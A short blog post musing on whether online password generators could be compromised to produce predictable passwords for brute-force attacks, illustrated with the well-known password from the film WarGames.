For many years I have recommended the use of online (and off-line) password generators for people needing assistance with making relatively strong passwords. But I've long had this nagging suspicion trying to express itself and yet have not until now. Right now, in fact.
What if the password generators are hacked or compromised? More specifically, what if the password generators choose from a set list of passwords that brute-force attackers then use in their automated attacks? Or, what if the list of generated passwords is compromised and, worse, related to the requesting IP address?
Limiting the possibilities of passwords dramatically increases the chances of brute-force password attacks succeeding.
A client once asked why he needed to change a password that had been guessed by an attacker — after all "X" website rated the password as "Very Strong". I told him about my favorite password of all time — the one used to launch the US nuclear missiles aimed at the Soviet Union in the movie Wargames. For the last several minutes of the film the password CPE1704TKS is flashing on the screen. Finally the computer realizes that thermonuclear war is less competitive than tic-tac-toe and stops the launch. Just because CPE1704TKS is a nice, letter/number combination that is not related to my user name, domain or pet iguana, doesn't mean I should use it for anything. After all, it's a well-known password. The client understood this (non-technical) explanation and changed his password (probably to CPE1704TKS1, but that's another story).
So, just as one cannot use a well-known password, even if it is well-formed, should we encourage the use of programmatically generated or, even more suspicious, website generated passwords?
Tell me what you think.
Robot.
